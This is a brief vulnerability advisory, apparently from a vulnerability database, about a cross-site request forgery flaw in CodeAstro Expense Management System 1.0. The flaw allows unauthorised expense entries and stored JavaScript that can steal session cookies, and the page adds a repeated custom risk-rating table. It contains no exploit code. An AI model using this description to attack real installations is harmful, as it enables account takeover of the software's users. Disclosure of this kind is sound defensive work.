CodeAstro Expense Management System Cross-Site Request Forgery Vulnerability

Vulnerability

A cross-site request forgery (CSRF) vulnerability has been identified in CodeAstro Expense Management System version 1.0. This vulnerability allows attackers to remotely craft malicious links that, when clicked by an authenticated user, perform unauthorized actions on their behalf. For example, an attacker could add an expense entry without the user's consent. Additionally, the vulnerability can be exploited to inject malicious JavaScript into the application, which is then executed when the victim accesses the Manage Expenses section. This could lead to session cookie theft and account takeover.

Impact

Exploitation of this vulnerability could result in unauthorized actions being performed on behalf of users, including the injection of malicious scripts that could be executed in the context of the user's session.

Added: Jun 22, 2025, 2:20 PM

Updated: Jun 22, 2025, 2:20 PM

Vulnerability Rating

Custom Algorithm

spread

0.0

impact

1.7

exploitability

7.7

remediation

0.0

relevance

0.2

threat

6.4

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

0.0

impact

1.7

exploitability

7.7

remediation

0.0

relevance

0.2

threat

6.4

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

CodeAstro Expense Management System Cross-Site Request Forgery Vulnerability

Vulnerability

Impact

Affected Products

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating